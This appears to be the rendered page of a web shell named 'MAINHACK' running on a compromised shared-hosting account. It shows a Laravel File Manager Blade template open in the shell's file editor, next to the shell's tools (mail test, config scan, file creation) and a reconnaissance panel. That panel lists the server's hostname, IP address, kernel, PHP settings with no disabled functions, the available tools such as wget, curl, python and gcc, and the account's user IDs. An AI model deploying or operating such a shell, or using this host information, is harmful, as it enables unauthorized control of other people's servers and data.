[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 545f80fddeffa4bea7097250b4f82b9b25609ff2.php
<div class="m-3 d-block d-lg-none"> <h1 style="font-size: 1.5rem;">Laravel File Manager</h1> <small class="d-block">Ver 2.0</small> <div class="row mt-3"> <div class="col-4"> <img src="<?php echo e(asset('vendor/laravel-filemanager/img/152px color.png')); ?>" class="w-100"> </div> <div class="col-8"> <p>Current usage :</p> <p>20 GB (Max : 1 TB)</p> </div> </div> <div class="progress mt-3" style="height: .5rem;"> <div class="progress-bar progress-bar-striped progress-bar-animated w-75 bg-main" role="progressbar" aria-valuenow="75" aria-valuemin="0" aria-valuemax="100"></div> </div> </div> <ul class="nav nav-pills flex-column"> <?php $__currentLoopData = $root_folders; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $root_folder): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <li class="nav-item"> <a class="nav-link" href="#" data-type="0" data-path="<?php echo e($root_folder->url); ?>"> <i class="fa fa-folder fa-fw"></i> <?php echo e($root_folder->name); ?> </a> </li> <?php $__currentLoopData = $root_folder->children; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $directory): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <li class="nav-item sub-item"> <a class="nav-link" href="#" data-type="0" data-path="<?php echo e($directory->url); ?>"> <i class="fa fa-folder fa-fw"></i> <?php echo e($directory->name); ?> </a> </li> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </ul> <?php /**PATH /home/aoneqssk/public_html/resources/views/vendor/laravel-filemanager/tree.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285